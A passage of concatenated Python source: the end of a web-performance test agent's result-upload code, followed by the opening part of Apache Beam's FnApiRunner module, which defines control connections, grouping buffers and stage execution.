filepath = os.path.join(video_dir, filename)
if os.path.isfile(filepath):
name = video_subdirectory + '/' + filename
if os.path.getsize(filepath) > 100000:
logging.debug('Uploading %s (%d bytes)', filename,
os.path.getsize(filepath))
if self.post_data(self.url + "resultimage.php", data,
filepath, task['prefix'] + '_' + filename):
os.remove(filepath)
else:
needs_zip.append({'path': filepath, 'name': name})
else:
needs_zip.append({'path': filepath, 'name': name})
# Upload the separate large files (> 100KB)
for filename in os.listdir(task['dir']):
filepath = os.path.join(task['dir'], filename)
if os.path.isfile(filepath):
# Delete any video files that may have squeaked by
if not self.job['keepvideo'] and filename[-4:] == '.mp4' and \
filename.find('rendered_video') == -1:
try:
os.remove(filepath)
except Exception:
pass
elif os.path.getsize(filepath) > 100000:
logging.debug('Uploading %s (%d bytes)', filename,
os.path.getsize(filepath))
if self.post_data(self.url + "resultimage.php", data, filepath, filename):
try:
os.remove(filepath)
except Exception:
pass
else:
needs_zip.append({'path': filepath, 'name': filename})
else:
needs_zip.append({'path': filepath, 'name': filename})
# Zip the remaining files
if len(needs_zip):
zip_path = os.path.join(task['dir'], "result.zip")
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_STORED) as zip_file:
for zipitem in needs_zip:
logging.debug('Storing %s (%d bytes)', zipitem['name'],
os.path.getsize(zipitem['path']))
zip_file.write(zipitem['path'], zipitem['name'])
try:
os.remove(zipitem['path'])
except Exception:
pass
# Post the workdone event for the task (with the zip attached)
if task['done']:
data['done'] = '1'
if task['error'] is not None:
data['error'] = task['error']
if cpu_pct is not None:
data['cpu'] = '{0:0.2f}'.format(cpu_pct)
logging.debug('Uploading result zip')
self.post_data(self.url + "workdone.php", data, zip_path, 'result.zip')
# Clean up so we don't leave directories lying around
if os.path.isdir(task['dir']):
try:
shutil.rmtree(task['dir'])
except Exception:
pass
if task['done'] and os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
def post_data(self, url, data, file_path, filename):
"""Send a multi-part post"""
ret = True
# pass the data fields as query params and any files as post data
url += "?"
for key in data:
if data[key] != None:
url += key + '=' + urllib.quote_plus(data[key]) + '&'
logging.debug(url)
try:
if file_path is not None and os.path.isfile(file_path):
self.session.post(url,
files={'file': (filename, open(file_path, 'rb'))},
timeout=300,)
else:
self.session.post(url)
except Exception:
logging.exception("Upload Exception")
ret = False
return ret
|
fn_api_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A PipelineRunner using the SDK harness.
"""
# pytype: skip-file
from __future__ import absolute_import
from __future__ import print_function
import collections
import contextlib
import copy
import itertools
import logging
import os
import queue
import subprocess
import sys
import threading
import time
from builtins import object
from typing import TYPE_CHECKING
from typing import Any
from typing import Callable
from typing import DefaultDict
from typing import Dict
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Mapping
from typing import Optional
from typing import Sequence
from typing import Tuple
from typing import Type
from typing import TypeVar
from typing import Union
from typing import overload
import grpc
from typing_extensions import Protocol
import apache_beam as beam # pylint: disable=ungrouped-imports
from apache_beam import coders
from apache_beam.coders.coder_impl import create_InputStream
from apache_beam.coders.coder_impl import create_OutputStream
from apache_beam.metrics import metric
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricResult
from apache_beam.options import pipeline_options
from apache_beam.options.value_provider import RuntimeValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import beam_provision_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import pipeline_context
from apache_beam.runners import runner
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner_transforms import create_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import only_element
from apache_beam.runners.portability.fn_api_runner_transforms import split_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import unique_name
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.sdk_worker import _Future
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.transforms import environments
from apache_beam.transforms import trigger
from apache_beam.transforms.window import GlobalWindow
from apache_beam.transforms.window import GlobalWindows
from apache_beam.utils import profiler
from apache_beam.utils import proto_utils
from apache_beam.utils import windowed_value
from apache_beam.utils.thread_pool_executor import UnboundedThreadPoolExecutor
if TYPE_CHECKING:
from google.protobuf import message # pylint: disable=ungrouped-imports
from apache_beam.pipeline import Pipeline
from apache_beam.coders.coder_impl import CoderImpl
from apache_beam.coders.coder_impl import WindowedValueCoderImpl
from apache_beam.portability.api import metrics_pb2
from apache_beam.transforms.window import BoundedWindow
T = TypeVar('T')
ConstructorFn = Callable[[
Union['message.Message', bytes],
'FnApiRunner.StateServicer',
Optional['ExtendedProvisionInfo'],
'GrpcServer'
],
'WorkerHandler']
DataSideInput = Dict[Tuple[str, str],
Tuple[bytes, beam_runner_api_pb2.FunctionSpec]]
DataOutput = Dict[str, bytes]
BundleProcessResult = Tuple[beam_fn_api_pb2.InstructionResponse,
List[beam_fn_api_pb2.ProcessBundleSplitResponse]]
# This module is experimental. No backwards-compatibility guarantees.
ENCODED_IMPULSE_VALUE = beam.coders.WindowedValueCoder(
beam.coders.BytesCoder(),
beam.coders.coders.GlobalWindowCoder()).get_impl().encode_nested(
beam.transforms.window.GlobalWindows.windowed_value(b''))
# State caching is enabled in the fn_api_runner for testing, except for one
# test which runs without state caching (FnApiRunnerTestWithDisabledCaching).
# The cache is disabled in production for other runners.
STATE_CACHE_SIZE = 100
# Time-based flush is enabled in the fn_api_runner by default.
DATA_BUFFER_TIME_LIMIT_MS = 1000
_LOGGER = logging.getLogger(__name__)
class ControlConnection(object):
_uid_counter = 0
_lock = threading.Lock()
def __init__(self):
self._push_queue = queue.Queue(
) # type: queue.Queue[beam_fn_api_pb2.InstructionRequest]
self._input = None # type: Optional[Iterable[beam_fn_api_pb2.InstructionResponse]]
self._futures_by_id = dict() # type: Dict[str, ControlFuture]
self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._state = BeamFnControlServicer.UNSTARTED_STATE
def _read(self):
for data in self._input:
self._futures_by_id.pop(data.instruction_id).set(data)
@overload
def push(self, req):
# type: (BeamFnControlServicer.DoneMarker) -> None
pass
@overload
def push(self, req):
# type: (beam_fn_api_pb2.InstructionRequest) -> ControlFuture
pass
def push(self, req):
if req == BeamFnControlServicer._DONE_MARKER:
self._push_queue.put(req)
return None
if not req.instruction_id:
with ControlConnection._lock:
ControlConnection._uid_counter += 1
req.instruction_id = 'control_%s' % ControlConnection._uid_counter
future = ControlFuture(req.instruction_id)
self._futures_by_id[req.instruction_id] = future
self._push_queue.put(req)
return future
def get_req(self):
# type: () -> beam_fn_api_pb2.InstructionRequest
return self._push_queue.get()
def set_input(self, input):
# type: (Iterable[beam_fn_api_pb2.InstructionResponse]) -> None
with ControlConnection._lock:
if self._input:
raise RuntimeError('input is already set.')
self._input = input
self._read_thread.start()
self._state = BeamFnControlServicer.STARTED_STATE
def close(self):
# type: () -> None
with ControlConnection._lock:
if self._state == BeamFnControlServicer.STARTED_STATE:
self.push(BeamFnControlServicer._DONE_MARKER)
self._read_thread.join()
self._state = BeamFnControlServicer.DONE_STATE
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
"""Implementation of BeamFnControlServicer for clients."""
UNSTARTED_STATE = 'unstarted'
STARTED_STATE = 'started'
DONE_STATE = 'done'
class DoneMarker(object):
pass
_DONE_MARKER = DoneMarker()
def __init__(self):
self._lock = threading.Lock()
self._uid_counter = 0
self._state = self.UNSTARTED_STATE
# following self._req_* variables are used for debugging purpose, data is
# added only when self._log_req is True.
self._req_sent = collections.defaultdict(int)
self._req_worker_mapping = {}
self._log_req = logging.getLogger().getEffectiveLevel() <= logging.DEBUG
self._connections_by_worker_id = collections.defaultdict(
ControlConnection) # type: DefaultDict[str, ControlConnection]
def get_conn_by_worker_id(self, worker_id):
# type: (str) -> ControlConnection
with self._lock:
return self._connections_by_worker_id[worker_id]
def Control(self,
iterator, # type: Iterable[beam_fn_api_pb2.InstructionResponse]
context
):
# type: (...) -> Iterator[beam_fn_api_pb2.InstructionRequest]
with self._lock:
if self._state == self.DONE_STATE:
return
else:
self._state = self.STARTED_STATE
worker_id = dict(context.invocation_metadata()).get('worker_id')
if not worker_id:
raise RuntimeError(
'All workers communicate through gRPC should have '
'worker_id. Received None.')
control_conn = self.get_conn_by_worker_id(worker_id)
control_conn.set_input(iterator)
while True:
to_push = control_conn.get_req()
if to_push is self._DONE_MARKER:
return
yield to_push
if self._log_req:
self._req_sent[to_push.instruction_id] += 1
def done(self):
self._state = self.DONE_STATE
_LOGGER.debug(
'Runner: Requests sent by runner: %s',
[(str(req), cnt) for req, cnt in self._req_sent.items()])
_LOGGER.debug(
'Runner: Requests multiplexing info: %s',
[(str(req), worker)
for req, worker in self._req_worker_mapping.items()])
class Buffer(Protocol):
def __iter__(self):
# type: () -> Iterator[bytes]
pass
def append(self, item):
# type: (bytes) -> None
pass
class PartitionableBuffer(Buffer, Protocol):
def partition(self, n):
# type: (int) -> List[List[bytes]]
pass
class _ListBuffer(List[bytes]):
"""Used to support parititioning of a list."""
def partition(self, n):
# type: (int) -> List[List[bytes]]
return [self[k::n] for k in range(n)]
class _GroupingBuffer(object):
"""Used to accumulate groupded (shuffled) results."""
def __init__(self,
pre_grouped_coder, # type: coders.Coder
post_grouped_coder, # type: coders.Coder
windowing
):
# type: (...) -> None
self._key_coder = pre_grouped_coder.key_coder()
self._pre_grouped_coder = pre_grouped_coder
self._post_grouped_coder = post_grouped_coder
self._table = collections.defaultdict(
list) # type: DefaultDict[bytes, List[Any]]
self._windowing = windowing
self._grouped_output = None # type: Optional[List[List[bytes]]]
def append(self, elements_data):
# type: (bytes) -> None
if self._grouped_output:
raise RuntimeError('Grouping table append after read.')
input_stream = create_InputStream(elements_data)
coder_impl = self._pre_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
# TODO(robertwb): We could optimize this even more by using a
# window-dropping coder for the data plane.
is_trivial_windowing = self._windowing.is_default()
while input_stream.size() > 0:
windowed_key_value = coder_impl.decode_from_stream(input_stream, True)
key, value = windowed_key_value.value
self._table[key_coder_impl.encode(key)].append(
value if is_trivial_windowing else windowed_key_value.
with_value(value))
def partition(self, n):
# type: (int) -> List[List[bytes]]
""" It is used to partition _GroupingBuffer to N parts. Once it is
partitioned, it would not be re-partitioned with diff N. Re-partition
is not supported now.
"""
if not self._grouped_output:
if self._windowing.is_default():
globally_window = GlobalWindows.windowed_value(
None,
timestamp=GlobalWindow().max_timestamp(),
pane_info=windowed_value.PaneInfo(
is_first=True,
is_last=True,
timing=windowed_value.PaneInfoTiming.ON_TIME,
index=0,
nonspeculative_index=0)).with_value
windowed_key_values = lambda key, values: [
globally_window((key, values))]
else:
# TODO(pabloem, BEAM-7514): Trigger driver needs access to the clock
# note that this only comes through if windowing is default - but what
# about having multiple firings on the global window.
# May need to revise.
trigger_driver = trigger.create_trigger_driver(self._windowing, True)
windowed_key_values = trigger_driver.process_entire_key
coder_impl = self._post_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
self._grouped_output = [[] for _ in range(n)]
output_stream_list = []
for _ in range(n):
output_stream_list.append(create_OutputStream())
for idx, (encoded_key, windowed_values) in enumerate(self._table.items()):
key = key_coder_impl.decode(encoded_key)
for wkvs in windowed_key_values(key, windowed_values):
coder_impl.encode_to_stream(wkvs, output_stream_list[idx % n], True)
for ix, output_stream in enumerate(output_stream_list):
self._grouped_output[ix] = [output_stream.get()]
self._table.clear()
return self._grouped_output
def __iter__(self):
# type: () -> Iterator[bytes]
""" Since partition() returns a list of lists, add this __iter__ to return
a list to simplify code when we need to iterate through ALL elements of
_GroupingBuffer.
"""
return itertools.chain(*self.partition(1))
class _WindowGroupingBuffer(object):
"""Used to partition windowed side inputs."""
def __init__(
self,
access_pattern,
coder # type: coders.WindowedValueCoder
):
# type: (...) -> None
# Here's where we would use a different type of partitioning
# (e.g. also by key) for a different access pattern.
if access_pattern.urn == common_urns.side_inputs.ITERABLE.urn:
self._kv_extractor = lambda value: ('', value)
self._key_coder = coders.SingletonCoder('') # type: coders.Coder
self._value_coder = coder.wrapped_value_coder
elif access_pattern.urn == common_urns.side_inputs.MULTIMAP.urn:
self._kv_extractor = lambda value: value
self._key_coder = coder.wrapped_value_coder.key_coder()
self._value_coder = (coder.wrapped_value_coder.value_coder())
else:
raise ValueError("Unknown access pattern: '%s'" % access_pattern.urn)
self._windowed_value_coder = coder
self._window_coder = coder.window_coder
self._values_by_window = collections.defaultdict(
list) # type: DefaultDict[Tuple[str, BoundedWindow], List[Any]]
def append(self, elements_data):
# type: (bytes) -> None
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_val_coder_impl = self._windowed_value_coder.get_impl(
) # type: WindowedValueCoderImpl
windowed_value = windowed_val_coder_impl.decode_from_stream(
input_stream, True)
key, value = self._kv_extractor(windowed_value.value)
for window in windowed_value.windows:
self._values_by_window[key, window].append(value)
def encoded_items(self):
# type: () -> Iterator[Tuple[bytes, bytes, bytes]]
value_coder_impl = self._value_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for (key, window), values in self._values_by_window.items():
encoded_window = self._window_coder.encode(window)
encoded_key = key_coder_impl.encode_nested(key)
output_stream = create_OutputStream()
for value in values:
value_coder_impl.encode_to_stream(value, output_stream, True)
yield encoded_key, encoded_window, output_stream.get()
class FnApiRunner(runner.PipelineRunner):
def __init__(
self,
default_environment=None, # type: Optional[environments.Environment]
bundle_repeat=0,
use_state_iterables=False,
provision_info=None, # type: Optional[ExtendedProvisionInfo]
progress_request_frequency=None):
# type: (...) -> None
"""Creates a new Fn API Runner.
Args:
default_environment: the default environment to use for UserFns.
bundle_repeat: replay every bundle this many extra times, for profiling
and debugging
use_state_iterables: Intentionally split gbk iterables over state API
(for testing)
provision_info: provisioning info to make available to workers, or None
progress_request_frequency: The frequency (in seconds) that the runner
waits before requesting progress from the SDK.
"""
super(FnApiRunner, self).__init__()
self._last_uid = -1
self._default_environment = (
default_environment or environments.EmbeddedPythonEnvironment())
self._bundle_repeat = bundle_repeat
self._num_workers = 1
self._progress_frequency = progress_request_frequency
self._profiler_factory = None # type: Optional[Callable[..., profiler.Profile]]
self._use_state_iterables = use_state_iterables
self._provision_info = provision_info or ExtendedProvisionInfo(
beam_provision_api_pb2.ProvisionInfo(
retrieval_token='unused-retrieval-token'))
def _next_uid(self):
self._last_uid += 1
return str(self._last_uid)
def run_pipeline(self,
pipeline, # type: Pipeline
options # type: pipeline_options.PipelineOptions
):
# type: (...) -> RunnerResult
RuntimeValueProvider.set_runtime_options({})
# Setup "beam_fn_api" experiment options if lacked.
experiments = (
options.view_as(pipeline_options.DebugOptions).experiments or [])
if not 'beam_fn_api' in experiments:
experiments.append('beam_fn_api')
options.view_as(pipeline_options.DebugOptions).experiments = experiments
# This is sometimes needed if type checking is disabled
# to enforce that the inputs (and outputs) of GroupByKey operations
# are known to be KVs.
from apache_beam.runners.dataflow.dataflow_runner import DataflowRunner
# TODO: Move group_by_key_input_visitor() to a non-dataflow specific file.
pipeline.visit(DataflowRunner.group_by_key_input_visitor())
self._bundle_repeat = self._bundle_repeat or options.view_as(
pipeline_options.DirectOptions).direct_runner_bundle_repeat
self._num_workers = options.view_as(
pipeline_options.DirectOptions).direct_num_workers or self._num_workers
# set direct workers running mode if it is defined with pipeline options.
running_mode = \
options.view_as(pipeline_options.DirectOptions).direct_running_mode
if running_mode == 'multi_threading':
self._default_environment = environments.EmbeddedPythonGrpcEnvironment()
elif running_mode == 'multi_processing':
command_string = '%s -m apache_beam.runners.worker.sdk_worker_main' \
% sys.executable
self._default_environment = environments.SubprocessSDKEnvironment(
command_string=command_string)
self._profiler_factory = profiler.Profile.factory_from_options(
options.view_as(pipeline_options.ProfilingOptions))
self._latest_run_result = self.run_via_runner_api(
pipeline.to_runner_api(default_environment=self._default_environment))
return self._latest_run_result
def run_via_runner_api(self, pipeline_proto):
# type: (beam_runner_api_pb2.Pipeline) -> RunnerResult
stage_context, stages = self.create_stages(pipeline_proto)
# TODO(pabloem, BEAM-7514): Create a watermark manager (that has access to
# the teststream (if any), and all the stages).
return self.run_stages(stage_context, stages)
@contextlib.contextmanager
def maybe_profile(self):
if self._profiler_factory:
try:
profile_id = 'direct-' + subprocess.check_output([
'git', 'rev-parse', '--abbrev-ref', 'HEAD'
]).decode(errors='ignore').strip()
except subprocess.CalledProcessError:
profile_id = 'direct-unknown'
profiler = self._profiler_factory(profile_id, time_prefix='')
else:
profiler = None
if profiler:
with profiler:
yield
if not self._bundle_repeat:
_LOGGER.warning(
'The --direct_runner_bundle_repeat option is not set; '
'a significant portion of the profile may be one-time overhead.')
path = profiler.profile_output
print('CPU Profile written to %s' % path)
try:
import gprof2dot # pylint: disable=unused-import
if not subprocess.call([sys.executable,
'-m',
'gprof2dot',
'-f',
'pstats',
path,
'-o',
path + '.dot']):
if not subprocess.call(
['dot', '-Tsvg', '-o', path + '.svg', path + '.dot']):
print(
'CPU Profile rendering at file://%s.svg' %
os.path.abspath(path))
except ImportError:
# pylint: disable=superfluous-parens
print('Please install gprof2dot and dot for profile renderings.')
else:
# Empty context.
yield
def create_stages(
self,
pipeline_proto # type: beam_runner_api_pb2.Pipeline
):
# type: (...) -> Tuple[fn_api_runner_transforms.TransformContext, List[fn_api_runner_transforms.Stage]]
return fn_api_runner_transforms.create_and_optimize_stages(
copy.deepcopy(pipeline_proto),
phases=[
fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.expand_sdf,
fn_api_runner_transforms.expand_gbk,
fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
fn_api_runner_transforms.impulse_to_input,
fn_api_runner_transforms.inject_timer_pcollections,
fn_api_runner_transforms.sort_stages,
fn_api_runner_transforms.window_pcollection_coders
],
known_runner_urns=frozenset([
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn
]),
use_state_iterables=self._use_state_iterables)
def run_stages(self,
stage_context, # type: fn_api_runner_transforms.TransformContext
stages # type: List[fn_api_runner_transforms.Stage]
):
# type: (...) -> RunnerResult
"""Run a list of topologically-sorted stages in batch mode.
Args:
stage_context (fn_api_runner_transforms.TransformContext)
stages (list[fn_api_runner_transforms.Stage])
"""
worker_handler_manager = WorkerHandlerManager(
stage_context.components.environments, self._provision_info)
metrics_by_stage = {}
monitoring_infos_by_stage = {}
try:
with self.maybe_profile():
pcoll_buffers = collections.defaultdict(
_ListBuffer) # type: DefaultDict[bytes, PartitionableBuffer]
for stage in stages:
stage_results = self._run_stage(
worker_handler_manager.get_worker_handlers,
stage_context.components,
stage,
pcoll_buffers,
stage_context.safe_coders)
metrics_by_stage[stage.name] = stage_results.process_bundle.metrics
monitoring_infos_by_stage[stage.name] = (
stage_results.process_bundle.monitoring_infos)
finally:
worker_handler_manager.close_all()
return RunnerResult(
runner.PipelineState.DONE, monitoring_infos_by_stage, metrics_by_stage)
def _store_side_inputs_in_state(self,
worker_handler, # type: WorkerHandler
context, # type: pipeline_context.PipelineContext
pipeline_components, # type: beam_runner_api_pb2.Components
data_side_input, # type: DataSideInput
pcoll_buffers, # type: Mapping[bytes, PartitionableBuffer]
safe_coders
):
# type: (...) -> None
for (transform_id, tag), (buffer_id, si) in data_side_input.items():
_, pcoll_id = split_buffer_id(buffer_id)
value_coder = context.coders[safe_coders[
pipeline_components.pcollections[pcoll_id].coder_id]]
elements_by_window = _WindowGroupingBuffer(si, value_coder)
for element_data in pcoll_buffers[buffer_id]:
elements_by_window.append(element_data)
if si.urn == common_urns.side_inputs.ITERABLE.urn:
for _, window, elements_data in elements_by_window.encoded_items():
state_key = beam_fn_api_pb2.StateKey(
iterable_side_input=beam_fn_api_pb2.StateKey.IterableSideInput(
transform_id=transform_id, side_input_id=tag, window=window))
worker_handler.state.append_raw(state_key, elements_data)
elif si.urn == common_urns.side_inputs.MULTIMAP.urn:
for key, window, elements_data in elements_by_window.encoded_items():
state_key = beam_fn_api_pb2.StateKey(
multimap_side_input=beam_fn_api_pb2.StateKey.MultimapSideInput(
transform_id=transform_id,
side_input_id=tag,
window=window,
key=key))
worker_handler.state.append_raw(state_key, elements_data)
else:
raise ValueError("Unknown access pattern: '%s'" % si.urn)
def _run_bundle_multiple_times_for_testing(
self,
worker_handler_list, # type: Sequence[WorkerHandler]
process_bundle_descriptor,
data_input,
data_output, # type: DataOutput
get_input_coder_callable,
cache_token_generator
):
# type: (...) -> None
"""
If bundle_repeat > 0, replay every bundle for profiling and debugging.
"""
# all workers share state, so use any worker_handler.
worker_handler = worker_handler_list[0]
for k in range(self._bundle_repeat):
try:
worker_handler.state.checkpoint()
testing_bundle_manager = ParallelBundleManager(
worker_handler_list,
lambda pcoll_id: _ListBuffer(),
get_input_coder_callable,
process_bundle_descriptor,
self._progress_frequency,
k,
num_workers=self._num_workers,
cache_token_generator=cache_token_generator)
testing_bundle_manager.process_bundle(data_input, data_output)
finally:
worker_handler.state.restore()
def _collect_written_timers_and_add_to_deferred_inputs(
self,
context, # type: pipeline_context.PipelineContext
pipeline_components, # type: beam_runner_api_pb2.Components
stage, # type: fn_api_runner_transforms.Stage
get_buffer_callable,
deferred_inputs # type: DefaultDict[str, PartitionableBuffer]
):
# type: (...) -> None
for transform_id, timer_writes in stage.timer_pcollections:
# Queue any set timers as new inputs.
windowed_timer_coder_impl = context.coders[
pipeline_components.pcollections[timer_writes].coder_id].get_impl()
written_timers = get_buffer_callable(
create_buffer_id(timer_writes, kind='timers'))
if written_timers:
# Keep only the "last" timer set per key and window.
timers_by_key_and_window = {}
for elements_data in written_timers:
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_key_timer = windowed_timer_coder_impl.decode_from_stream(
input_stream, True)
key, _ = windowed_key_timer.value
# TODO: Explode and merge windows.
assert len(windowed_key_timer.windows) == 1
timers_by_key_and_window[
key, windowed_key_timer.windows[0]] = windowed_key_timer
out = create_OutputStream()
for windowed_key_timer in timers_by_key_and_window.values():
windowed_timer_coder_impl.encode_to_stream(
windowed_key_timer, out, True)
deferred_inputs[transform_id] = _ListBuffer([out.get()])
written_timers[:] = []
def _add_residuals_and_channel_splits_to_deferred_inputs(
self,
splits, # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse]
get_input_coder_callable,
input_for_callable,
last_sent,
deferred_inputs # type: DefaultDict[str, PartitionableBuffer]
):
# type: (...) -> None
prev_stops = {} # type: Dict[str, int]
for split in splits:
for delayed_application in split.residual_roots:
deferred_inputs[input_for_callable(
delayed_application.application.transform_id,
delayed_application.application.input_id)].append(
delayed_application.application.element)
for channel_split in split.channel_splits:
coder_impl = get_input_coder_callable(channel_split.transform_id)
# TODO(SDF): This requires determanistic ordering of buffer iteration.
# TODO(SDF): The return split is in terms of indices. Ideally,
# a runner could map these back to actual positions to effectively
# describe the two "halves" of the now-split range. Even if we have
# to buffer each element we send (or at the very least a bit of
# metadata, like position, about each of them) this should be doable
# if they're already in memory and we are bounding the buffer size
# (e.g. to 10mb plus whatever is eagerly read from the SDK). In the
# case of non-split-points, we can either immediately replay the
# "non-split-position" elements or record them as we do the other
# delayed applications.
# Decode and recode to split the encoded buffer by element index.
all_elements = list(
coder_impl.decode_all(
b''.join(last_sent[channel_split.transform_id])))
residual_elements = all_elements[
channel_split.first_residual_element:prev_stops.
get(channel_split.transform_id, len(all_elements)) + 1]
if residual_elements:
deferred_inputs[channel_split.transform_id].append(
coder_impl.encode_all(residual_elements))
prev_stops[
channel_split.transform_id] = channel_split.last_primary_element
@staticmethod
def _extract_stage_data_endpoints(
stage, # type: fn_api_runner_transforms.Stage
pipeline_components, # type: beam_runner_api_pb2.Components
data_api_service_descriptor,
pcoll_buffers # type: DefaultDict[bytes, PartitionableBuffer]
):
# type: (...) -> Tuple[Dict[Tuple[str, str], PartitionableBuffer], DataSideInput, Dict[Tuple[str, str], bytes]]
# Returns maps of transform names to PCollection identifiers.
# Also mutates IO stages to point to the data ApiServiceDescriptor.
data_input = {} # type: Dict[Tuple[str, str], PartitionableBuffer]
data_side_input = {} # type: DataSideInput
data_output = {} # type: Dict[Tuple[str, str], bytes]
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
target = transform.unique_name, only_element(transform.outputs)
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[target] = _ListBuffer([ENCODED_IMPULSE_VALUE])
else:
data_input[target] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[only_element(
transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
target = transform.unique_name, only_element(transform.inputs)
data_output[target] = pcoll_id
coder_id = pipeline_components.pcollections[only_element(
transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
def _run_stage(self,
worker_handler_factory, # type: Callable[[Optional[str], int], List[WorkerHandler]]
pipeline_components, # type: beam_runner_api_pb2.Components
stage, # type: fn_api_runner_transforms.Stage
pcoll_buffers, # type: DefaultDict[bytes, PartitionableBuffer]
safe_coders
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
"""Run an individual stage.
Args:
worker_handler_factory: A ``callable`` that takes in an environment id
and a number of workers, and returns a list of ``WorkerHandler``s.
pipeline_components (beam_runner_api_pb2.Components): TODO
stage (fn_api_runner_transforms.Stage)
pcoll_buffers (collections.defaultdict of str: list): Mapping of
PCollection IDs to list that functions as buffer for the
``beam.PCollection``.
safe_coders (dict): TODO
"""
def iterable_state_write(values, element_coder_impl):
# type: (...) -> bytes
token = unique_name(None, 'iter').encode('ascii')
out = create_OutputStream()
for element in values:
element_coder_impl.encode_to_stream(element, out, True)
worker_handler.state.append_raw(
beam_fn_api_pb2.StateKey(
runner=beam_fn_api_pb2.StateKey.Runner(key=token)),
out.get())
return token
worker_handler_list = worker_handler_factory(
stage.environment, self._num_workers)
# All worker_handlers share the same grpc server, so we can read grpc server
# info from any worker_handler and read from the first worker_handler.
worker_handler = next(iter(worker_handler_list))
context = pipeline_context.PipelineContext(
pipeline_components, iterable_state_write=iterable_state_write)
data_api_service_descriptor = worker_handler.data_api_service_descriptor()
_LOGGER.info('Running %s', stage.name)
data_input, data_side_input, data_output = self._extract_endpoints(
stage, pipeline_components, data_api_service_descriptor, pcoll_buffers)
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms={
transform.unique_name: transform
for transform in stage.transforms
},
pcollections=dict(pipeline_components.pcollections.items()),
coders=dict(pipeline_components.coders.items()),
windowing_strategies=dict(
pipeline_components.windowing_strategies.items()),
environments=dict(pipeline_components.environments.items()))
state_api_service_descriptor = worker_handler.state_api_service_descriptor()
if state_api_service_descriptor:
process_bundle_descriptor.state_api_service_descriptor.url = (
state_api_service_descriptor.url)
# Store the required side inputs into state so it is accessible for the
# worker when it runs this bundle.
self._store_side_inputs_in_state(
worker_handler,
context,
pipeline_components,
data_side_input,
pcoll_buffers,
safe_coders)
def get_buffer(buffer_id):
# type: (bytes) -> PartitionableBuffer
"""Returns the buffer for a given (operation_type, PCollection ID).
For grouping-typed operations, we produce a ``_GroupingBuffer``. For
others, we produce a ``_ListBuffer``.
"""
kind, name = split_buffer_id(buffer_id)
if kind in ('materialize', 'timers'):
# If `buffer_id` is not a key in `pcoll_buffers`, it will be added by
# the `defaultdict`.
return pcoll_buffers[buffer_id]
elif kind == 'group':
# This is a grouping write, create a grouping buffer if needed.
if buffer_id not in pcoll_buffers:
original_gbk_transform = name
transform_proto = pipeline_components.transforms[
original_gbk_transform]
input_pcoll = only_element(list(transform_proto.inputs.values()))
output_pcoll = only_element(list(transform_proto.outputs.values()))
pre_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[input_pcoll].coder_id]]
post_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[output_pcoll].coder_id]]
windowing_strategy = context.windowing_strategies[
